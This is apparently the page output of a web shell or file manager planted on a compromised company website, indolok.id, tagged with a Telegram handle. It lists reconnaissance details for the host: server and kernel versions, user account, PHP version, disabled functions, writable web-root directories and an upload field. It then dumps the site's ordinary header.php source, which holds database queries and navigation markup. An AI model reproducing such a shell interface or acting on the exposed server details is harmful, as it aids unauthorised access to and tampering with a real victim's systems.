https://t.me/RX1948
Server : Apache/2.4.18 (Ubuntu)
System : Linux canvaswebdesign 3.13.0-71-generic #114-Ubuntu SMP Tue Dec 1 02:34:22 UTC 2015 x86_64
User : oppastar ( 1041)
PHP Version : 7.0.33-0ubuntu0.16.04.15
Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,
Directory :  /var/www/indolok.id/public_html/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Current File : /var/www/indolok.id/public_html/header.php
<!DOCTYPE html>
<html style="font-size: 16px;" lang="en-ID">

<head>
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <meta charset="utf-8">
    <meta name="keywords" content="On Top of the World, Slideshow Title, INDOLOK ​​BAKTI UTAMA, Berita dan Artikel Terbaru">
    <meta name="description" content="">
    <title>Welcome to Indolok</title>
    <link rel="stylesheet" href="canvasweb2.css" media="screen">
    <script src="https://kit.fontawesome.com/64d9526424.js" crossorigin="anonymous"></script>

    <?php
    // Get the current script name
    $current_page = basename($_SERVER['PHP_SELF']); 
    
    // Include database connection and fetch solutions
    require_once 'db_connection.php';
    
    // Fetch solutions from database ordered by priority
    $solutions_query = "SELECT solution, alias FROM solutions WHERE status = '1' ORDER BY priority ASC";
    $solutions_result = $conn->query($solutions_query);
    $solutions = [];
    if ($solutions_result && $solutions_result->num_rows > 0) {
        while($row = $solutions_result->fetch_assoc()) {
            $solutions[] = $row;
        }
    }
    
    // Fetch categories for Product & Solutions menu
    $categories_query = "SELECT category, alias FROM categories WHERE status = '1' AND parent IS NULL ORDER BY priority ASC";
    $categories_result = $conn->query($categories_query);
    $categories = [];
    if ($categories_result && $categories_result->num_rows > 0) {
        while($row = $categories_result->fetch_assoc()) {
            $categories[] = $row;
        }
    }
    
    // Fetch categories for Produk & Solusi menu
    $categories_query = "SELECT category, alias FROM categories WHERE status = '1' AND parent IS NULL ORDER BY priority ASC";
    $categories_result = $conn->query($categories_query);
    $categories = [];
    if ($categories_result && $categories_result->num_rows > 0) {
        while($row = $categories_result->fetch_assoc()) {
            $categories[] = $row;
        }
    }
    
    // Fetch categories for Produk & Solusi menu
    $categories_query = "SELECT category, alias FROM categories WHERE status = '1' AND parent IS NULL ORDER BY priority ASC";
    $categories_result = $conn->query($categories_query);
    $categories = [];
    if ($categories_result && $categories_result->num_rows > 0) {
        while($row = $categories_result->fetch_assoc()) {
            $categories[] = $row;
        }
    }
    ?>
    <?php if($current_page == "index.php" || $current_page == "") : ?>
        <link rel="stylesheet" href="Indolok3.css" media="screen">
    <?php elseif($current_page == "blog-detail.php") : ?>
        <link rel="stylesheet" href="blog-detail.css" media="screen">
    <?php elseif($current_page == "blog.php") : ?>
        <link rel="stylesheet" href="blog2.css" media="screen" />
    <?php elseif($current_page == "about-indolok.php") : ?>
        <link rel="stylesheet" href="about-indolok.css" media="screen" />
    <?php elseif($current_page == "branches.php") : ?>
        <link rel="stylesheet" href="branches.css" media="screen" />
    <?php elseif($current_page == "solution.php") : ?>
        <link rel="stylesheet" href="solution.css" media="screen" />
    <?php elseif($current_page == "product-detail.php") : ?>
        <link rel="stylesheet" href="product-detail.css" media="screen" />
    <?php elseif($current_page == "certifications.php") : ?>
        <link rel="stylesheet" href="certifications.css" media="screen" /> 
    <?php elseif($current_page == "solutions.php") : ?>
        <link rel="stylesheet" href="solutions.css" media="screen" />
    <?php elseif($current_page == "fire-solutions.php") : ?>
        <link rel="stylesheet" href="fire-solutions.css" media="screen" />
    <?php elseif($current_page == "security-solutions.php") : ?>
        <link rel="stylesheet" href="security-solutions.css" media="screen" />
    <?php elseif($current_page == "industry-detail.php") : ?>
        <link rel="stylesheet" href="industry-detail3.css" media="screen" />
    <?php elseif($current_page == "industries.php") : ?>
    <link rel="stylesheet" href="industries3.css" media="screen" />
    <?php elseif($current_page == "clients.php") : ?>
        <link rel="stylesheet" href="clients.css" media="screen" />
    <?php elseif($current_page == "contact-us.php") : ?>
        <link rel="stylesheet" href="contact-us.css" media="screen" />
    <?php elseif($current_page == "airport-security-solutions.php") : ?>
        <link rel="stylesheet" href="airport-security-solutions.css" media="screen" />
    <?php elseif($current_page == "offices-and-public-building.php") : ?>
        <link rel="stylesheet" href="offices-and-public-building.css" media="screen" />
    <?php endif ?>    
  
    <script class="u-script" type="text/javascript" src="jquery.js" defer=""></script>
    <script class="u-script" type="text/javascript" src="canvasweb.js" defer=""></script>
    <meta name="generator" content="Canvasweb 6.8.9, canvasweb.com">
    <link id="u-theme-google-font" rel="stylesheet" href="https://fonts.googleapis.com/css?family=Roboto:100,100i,300,300i,400,400i,500,500i,700,700i,900,900i|Open+Sans:300,300i,400,400i,500,500i,600,600i,700,700i,800,800i">
    <link id="u-page-google-font" rel="stylesheet" href="https://fonts.googleapis.com/css?family=Roboto:100,100i,300,300i,400,400i,500,500i,700,700i,900,900i|Roboto:100,100i,300,300i,400,400i,500,500i,700,700i,900,900i|Poppins:100,100i,200,200i,300,300i,400,400i,500,500i,600,600i,700,700i,800,800i,900,900i">
    <script type="application/ld+json">
        {
            "@context": "http://schema.org",
            "@type": "Organization",
            "name": "Indolok",
            "logo": "images/logo-white2.png",
            "sameAs": [
                "https://instagram.com/name"
            ]
        }
    </script>
    <meta name="theme-color" content="#478ac9">
    <meta property="og:title" content="Indolok Homepage">
    <meta property="og:description" content="">
    <meta property="og:type" content="website">
    <meta data-intl-tel-input-cdn-path="intlTelInput/">

    <style>
    .floatWaDesk2 {
        font-size: 60px;
        position: fixed;
        right: 15px;
        bottom: 80px;
        z-index: 100001;
        padding: 10px 10px;
        color: #00D300;
        text-align: center;
        text-decoration: none;
        transition: all .5s;
    }
    </style>

    <!-- Google tag (gtag.js) -->
    <script async src="https://www.googletagmanager.com/gtag/js?id=AW-776444990">
    </script>
    <script>
    window.dataLayer = window.dataLayer || [];
    function gtag(){dataLayer.push(arguments);}
    gtag('js', new Date());

    gtag('config', 'AW-776444990');
    </script>

    <!-- Google Tag Manager -->
    <script>(function(w,d,s,l,i){w[l]=w[l]||[];w[l].push({'gtm.start':
    new Date().getTime(),event:'gtm.js'});var f=d.getElementsByTagName(s)[0],
    j=d.createElement(s),dl=l!='dataLayer'?'&l='+l:'';j.async=true;j.src=
    'https://www.googletagmanager.com/gtm.js?id='+i+dl;f.parentNode.insertBefore(j,f);
    })(window,document,'script','dataLayer','GTM-5B6C9TZ');</script>
    <!-- End Google Tag Manager -->
</head>

<body data-home-page="Indolok.html" data-home-page-title="Indolok" data-path-to-root="./" data-include-products="true" class="u-body u-xl-mode" data-lang="en">

    <noscript><iframe src="https://www.googletagmanager.com/ns.html?id=GTM-5B6C9TZ"
  height="0" width="0" style="display:none;visibility:hidden"></iframe></noscript>


    <header class="u-clearfix u-header u-sticky u-sticky-0fc4 u-white u-header" id="sec-2862">
        <div class="u-clearfix u-sheet u-valign-middle-sm u-sheet-1">
            <a href="https://www.indolok.id" class="u-image u-logo u-image-1" data-image-width="595" data-image-height="154">
                <img src="images/logo-white2.png" class="u-logo-image u-logo-image-1">
            </a>
            <nav class="u-menu u-menu-dropdown u-offcanvas u-menu-1" data-responsive-from="MD">
                <div class="menu-collapse u-custom-font" style="font-size: 0.9375rem; letter-spacing: 0px; font-family: Poppins;">
                    <a class="u-button-style u-custom-hover-color u-custom-left-right-menu-spacing u-custom-padding-bottom u-custom-text-active-color u-custom-text-color u-custom-text-hover-color u-custom-top-bottom-menu-spacing u-nav-link u-text-active-palette-1-base u-text-hover-palette-2-base" href="#" data-lang-en="{&quot;content&quot;:&quot;<svg class=\&quot;u-svg-link\&quot; viewBox=\&quot;0 0 24 24\&quot;><use xmlns:xlink=\&quot;http://www.w3.org/1999/xlink\&quot; xlink:href=\&quot;#menu-hamburger\&quot;></use></svg><svg class=\&quot;u-svg-content\&quot; version=\&quot;1.1\&quot; id=\&quot;menu-hamburger\&quot; viewBox=\&quot;0 0 16 16\&quot; x=\&quot;0px\&quot; y=\&quot;0px\&quot; xmlns:xlink=\&quot;http://www.w3.org/1999/xlink\&quot; xmlns=\&quot;http://www.w3.org/2000/svg\&quot;>    <g>        <rect y=\&quot;1\&quot; width=\&quot;16\&quot; height=\&quot;2\&quot;></rect>        <rect y=\&quot;7\&quot; width=\&quot;16\&quot; height=\&quot;2\&quot;></rect>        <rect y=\&quot;13\&quot; width=\&quot;16\&quot; height=\&quot;2\&quot;></rect>    </g></svg>&quot;,&quot;href&quot;:&quot;#&quot;}" data-lang-id="{&quot;content&quot;:&quot;<svg class=\&quot;u-svg-link\&quot; viewBox=\&quot;0 0 24 24\&quot;><use xmlns:xlink=\&quot;http://www.w3.org/1999/xlink\&quot; xlink:href=\&quot;#menu-hamburger\&quot;></use></svg><svg class=\&quot;u-svg-content\&quot; version=\&quot;1.1\&quot; id=\&quot;menu-hamburger\&quot; viewBox=\&quot;0 0 16 16\&quot; x=\&quot;0px\&quot; y=\&quot;0px\&quot; xmlns:xlink=\&quot;http://www.w3.org/1999/xlink\&quot; xmlns=\&quot;http://www.w3.org/2000/svg\&quot;>    <g>        <rect y=\&quot;1\&quot; width=\&quot;16\&quot; height=\&quot;2\&quot;></rect>        <rect y=\&quot;7\&quot; width=\&quot;16\&quot; height=\&quot;2\&quot;></rect>        <rect y=\&quot;13\&quot; width=\&quot;16\&quot; height=\&quot;2\&quot;></rect>    </g></svg>&quot;,&quot;href&quot;:&quot;#&quot;}" style="padding: 6px 2px; font-size: calc(1em + 12px);">
                        <svg class="u-svg-link" viewBox="0 0 24 24">
                            <use xmlns:xlink="http://www.w3.org/1999/xlink" xlink:href="#menu-hamburger"></use>
                        </svg>
                        <svg class="u-svg-content" version="1.1" id="menu-hamburger" viewBox="0 0 16 16" x="0px" y="0px" xmlns:xlink="http://www.w3.org/1999/xlink" xmlns="http://www.w3.org/2000/svg">
                            <g>
                                <rect y="1" width="16" height="2"></rect>
                                <rect y="7" width="16" height="2"></rect>
                                <rect y="13" width="16" height="2"></rect>
                            </g>
                        </svg>
                    </a>
                </div>
                <div class="u-custom-menu u-nav-container">
                    <ul class="u-custom-font u-nav u-spacing-3 u-unstyled u-nav-1">
                        <li class="u-nav-item"><a class="u-border-active-custom-color-2 u-button-style u-nav-link u-text-active-custom-color-9 u-text-custom-color-5 u-text-hover-custom-color-9" href="https://www.indolok.id" data-lang-id="{&quot;content&quot;:&quot;Home&quot;,&quot;href&quot;:&quot;Indolok.html&quot;}" data-lang-en="{&quot;content&quot;:&quot;Home&quot;,&quot;href&quot;:&quot;Indolok.html&quot;}" style="padding: 18px 20px;">Home</a>
                        </li>
                        <li class="u-nav-item"><a class="u-border-active-custom-color-2 u-button-style u-nav-link u-text-active-custom-color-9 u-text-custom-color-5 u-text-hover-custom-color-9" href="#" data-lang-en="{&quot;content&quot;:&quot;Tentang Kami&quot;,&quot;href&quot;:&quot;#&quot;}" data-lang-id="{&quot;content&quot;:&quot;Tentang&quot;,&quot;href&quot;:&quot;#&quot;}" style="padding: 18px 20px;">Tentang Kami</a>
                            <div class="u-nav-popup">
                                <ul class="u-custom-font u-h-spacing-18 u-nav u-unstyled u-v-spacing-10 u-nav-2">
                                    <li class="u-nav-item"><a class="u-button-style u-custom-color-10 u-nav-link" href="about-indolok.php" data-lang-en="{&quot;content&quot;:&quot;Tentang kami&quot;,&quot;href&quot;:&quot;about-indolok.php&quot;}" data-lang-id="{&quot;content&quot;:&quot;Tentang kami&quot;,&quot;href&quot;:&quot;about-indolok.php&quot;}">Tentang kami</a>
                                    </li>
                                    <li class="u-nav-item"><a class="u-button-style u-custom-color-10 u-nav-link" href="branches.php" data-lang-en="{&quot;content&quot;:&quot;Kantor Cabang &amp;amp; Distributor&quot;,&quot;href&quot;:&quot;branches.php&quot;}" data-lang-id="{&quot;content&quot;:&quot;Kantor Cabang &amp;amp; Distributor&quot;,&quot;href&quot;:&quot;branches.php&quot;}">Kantor Cabang &amp; Distributor</a>
                                    </li>
                                    <li class="u-nav-item"><a class="u-button-style u-custom-color-10 u-nav-link" href="certifications.php" data-lang-en="{&quot;content&quot;:&quot;Sertifikasi&quot;,&quot;href&quot;:&quot;certifications.php&quot;}" data-lang-id="{&quot;content&quot;:&quot;Sertifikasi&quot;,&quot;href&quot;:&quot;certifications.php&quot;}">Sertifikasi</a>
                                    </li>
                                </ul>
                            </div>
                        </li>
                        <li class="u-nav-item"><a class="u-border-active-custom-color-2 u-button-style u-nav-link u-text-active-custom-color-9 u-text-custom-color-5 u-text-hover-custom-color-9" href="industries.php" data-lang-en="{&quot;content&quot;:&quot;Solusi&quot;,&quot;href&quot;:&quot;solutions.php&quot;}" data-lang-id="{&quot;content&quot;:&quot;Solusi&quot;,&quot;href&quot;:&quot;solutions.php&quot;}" style="padding: 18px 20px;">Industri</a>
                            <div class="u-nav-popup">
                                <ul class="u-custom-font u-h-spacing-18 u-nav u-unstyled u-v-spacing-10 u-nav-3">
                                    <?php foreach($solutions as $solution): ?>
                                    <li class="u-nav-item"><a class="u-button-style u-custom-color-10 u-nav-link" href="industry-detail.php?type=<?php echo urlencode($solution['alias']); ?>"><?php echo htmlspecialchars($solution['solution']); ?></a>
                                    </li>
                                    <?php endforeach; ?>
                                </ul>
                            </div> 
                        </li>

                        <li class="u-nav-item"><a class="u-border-active-custom-color-2 u-button-style u-nav-link u-text-active-custom-color-9 u-text-custom-color-5 u-text-hover-custom-color-9" href="#" data-lang-en="{&quot;content&quot;:&quot;Solusi&quot;,&quot;href&quot;:&quot;solutions.php&quot;}" data-lang-id="{&quot;content&quot;:&quot;Solusi&quot;,&quot;href&quot;:&quot;solutions.php&quot;}" style="padding: 18px 20px;">Solusi & Produk</a>
                            <div class="u-nav-popup">
                                <ul class="u-custom-font u-h-spacing-18 u-nav u-unstyled u-v-spacing-10 u-nav-3">
                                    <?php foreach($categories as $category): ?>
                                        <li class="u-nav-item"><a class="u-button-style u-custom-color-10 u-nav-link" href="solution.php?type=<?php echo urlencode($category['alias']); ?>"><?php echo htmlspecialchars($category['category']); ?></a>
                                        </li>
                                    <?php endforeach; ?>
                                </ul>
                            </div> 
                        </li>
                        <li class="u-nav-item"><a class="u-border-active-custom-color-2 u-button-style u-nav-link u-text-active-custom-color-9 u-text-custom-color-5 u-text-hover-custom-color-9" href="clients.php" data-lang-en="{&quot;content&quot;:&quot;Klien&quot;,&quot;href&quot;:&quot;clients.php&quot;}" data-lang-id="{&quot;content&quot;:&quot;Klien&quot;,&quot;href&quot;:&quot;clients.php&quot;}" style="padding: 18px 20px;">Klien</a>
                        </li>
                        <li class="u-nav-item"><a class="u-border-active-custom-color-2 u-button-style u-nav-link u-text-active-custom-color-9 u-text-custom-color-5 u-text-hover-custom-color-9" href="blog.php" data-lang-en="{&quot;content&quot;:&quot;Artikel&quot;,&quot;href&quot;:&quot;blog.html&quot;}" data-lang-id="{&quot;content&quot;:&quot;Artikel&quot;,&quot;href&quot;:&quot;blog.html&quot;}" style="padding: 18px 20px;">Artikel</a>
                        </li>
                        <li class="u-nav-item"><a class="u-border-active-custom-color-2 u-button-style u-nav-link u-text-active-custom-color-9 u-text-custom-color-5 u-text-hover-custom-color-9" href="contact-us.php" data-lang-en="{&quot;content&quot;:&quot;Contact&quot;,&quot;href&quot;:&quot;contact-us.php&quot;}" data-lang-id="{&quot;content&quot;:&quot;Contact&quot;,&quot;href&quot;:&quot;contact-us.php&quot;}" style="padding: 18px 20px;">Contact</a>
                        </li>
                    </ul>
                </div>
                <div class="u-custom-menu u-nav-container-collapse">
                    <div class="u-container-style u-custom-color-1 u-inner-container-layout u-opacity u-opacity-95 u-sidenav">
                        <div class="u-inner-container-layout u-sidenav-overflow">
                            <div class="u-menu-close"></div>
                            <ul class="u-align-left u-custom-font u-nav u-popupmenu-items u-spacing-11 u-unstyled u-nav-4">
                                <li class="u-nav-item"><a class="u-button-style u-nav-link" href="https://www.indolok.id" data-lang-id="{&quot;content&quot;:&quot;Home&quot;,&quot;href&quot;:&quot;Indolok.html&quot;}" data-lang-en="{&quot;content&quot;:&quot;Home&quot;,&quot;href&quot;:&quot;Indolok.html&quot;}">Home</a>
                                </li>
                                <li class="u-nav-item"><a class="u-button-style u-nav-link" href="#" data-lang-en="{&quot;content&quot;:&quot;Tentang Kami&quot;,&quot;href&quot;:&quot;#&quot;}" data-lang-id="{&quot;content&quot;:&quot;Tentang&quot;,&quot;href&quot;:&quot;#&quot;}">Tentang Kami <i class="fas fa-chevron-down" style="font-size: 12px; margin-left: 5px;"></i></a>
                                    <div class="u-nav-popup">
                                        <ul class="u-custom-font u-h-spacing-18 u-nav u-unstyled u-v-spacing-10 u-nav-5">
                                            <li class="u-nav-item"><a class="u-button-style u-nav-link" href="about-indolok.php" data-lang-en="{&quot;content&quot;:&quot;Tentang kami&quot;,&quot;href&quot;:&quot;about-indolok.php&quot;}" data-lang-id="{&quot;content&quot;:&quot;Tentang kami&quot;,&quot;href&quot;:&quot;about-indolok.php&quot;}">Tentang kami</a>
                                            </li>
                                            <li class="u-nav-item"><a class="u-button-style u-nav-link" href="branches.php" data-lang-en="{&quot;content&quot;:&quot;Kantor Cabang &amp;amp; Distributor&quot;,&quot;href&quot;:&quot;branches.php&quot;}" data-lang-id="{&quot;content&quot;:&quot;Kantor Cabang &amp;amp; Distributor&quot;,&quot;href&quot;:&quot;branches.php&quot;}">Kantor Cabang &amp; Distributor</a>
                                            </li>
                                            <li class="u-nav-item"><a class="u-button-style u-nav-link" href="certifications.php" data-lang-en="{&quot;content&quot;:&quot;Sertifikasi&quot;,&quot;href&quot;:&quot;certifications.php&quot;}" data-lang-id="{&quot;content&quot;:&quot;Sertifikasi&quot;,&quot;href&quot;:&quot;certifications.php&quot;}">Sertifikasi</a>
                                            </li>
                                        </ul>
                                    </div>
                                </li>
                                <li class="u-nav-item"><a class="u-button-style u-nav-link" href="https://www.indolok.id/industries.php" data-lang-en="{&quot;content&quot;:&quot;Solusi&quot;,&quot;href&quot;:&quot;solutions.php&quot;}" data-lang-id="{&quot;content&quot;:&quot;Solusi&quot;,&quot;href&quot;:&quot;solutions.php&quot;}">Industri <i class="fas fa-chevron-down" style="font-size: 12px; margin-left: 5px;"></i></a>
                                    <div class="u-nav-popup">
                                        <ul class="u-custom-font u-h-spacing-18 u-nav u-unstyled u-v-spacing-10 u-nav-6">
                                            <?php foreach($solutions as $solution): ?>
                                            <li class="u-nav-item"><a class="u-button-style u-nav-link" href="industry-detail.php?type=<?php echo urlencode($solution['alias']); ?>"><?php echo htmlspecialchars($solution['solution']); ?></a>
                                            </li>
                                            <?php endforeach; ?>
                                        </ul>
                                    </div>
                                </li> 

                                <li class="u-nav-item"><a class="u-button-style u-nav-link" href="#" data-lang-en="{&quot;content&quot;:&quot;Solusi&quot;,&quot;href&quot;:&quot;solutions.php&quot;}" data-lang-id="{&quot;content&quot;:&quot;Solusi&quot;,&quot;href&quot;:&quot;solutions.php&quot;}">Solusi & Produk <i class="fas fa-chevron-down" style="font-size: 12px; margin-left: 5px;"></i></a>
                                    <div class="u-nav-popup">
                                        <ul class="u-custom-font u-h-spacing-18 u-nav u-unstyled u-v-spacing-10 u-nav-6">
                                            <?php foreach($categories as $category): ?>
                                            <li class="u-nav-item"><a class="u-button-style u-nav-link" href="industry-detail.php?type=<?php echo urlencode($category['alias']); ?>"><?php echo htmlspecialchars($category['category']); ?></a>
                                            </li>
                                            <?php endforeach; ?>
                                        </ul>
                                    </div>
                                </li> 
                                <li class="u-nav-item"><a class="u-button-style u-nav-link" href="clients.php" data-lang-en="{&quot;content&quot;:&quot;Klien&quot;,&quot;href&quot;:&quot;clients.php&quot;}" data-lang-id="{&quot;content&quot;:&quot;Klien&quot;,&quot;href&quot;:&quot;clients.php&quot;}">Klien</a>
                                </li>
                                <li class="u-nav-item"><a class="u-button-style u-nav-link" href="blog.php" data-lang-en="{&quot;content&quot;:&quot;Artikel&quot;,&quot;href&quot;:&quot;blog.html&quot;}" data-lang-id="{&quot;content&quot;:&quot;Artikel&quot;,&quot;href&quot;:&quot;blog.html&quot;}">Artikel</a>
                                </li>
                                <li class="u-nav-item"><a class="u-button-style u-nav-link" href="contact-us.php" data-lang-en="{&quot;content&quot;:&quot;Contact&quot;,&quot;href&quot;:&quot;contact-us.php&quot;}" data-lang-id="{&quot;content&quot;:&quot;Contact&quot;,&quot;href&quot;:&quot;contact-us.php&quot;}">Contact</a>
                                </li>
                            </ul>
                        </div>
                    </div>
                    <div class="u-black u-menu-overlay u-opacity u-opacity-70"></div>
                </div>
            </nav>
        </div>
    </header>

https://t.me/RX1948 - 2025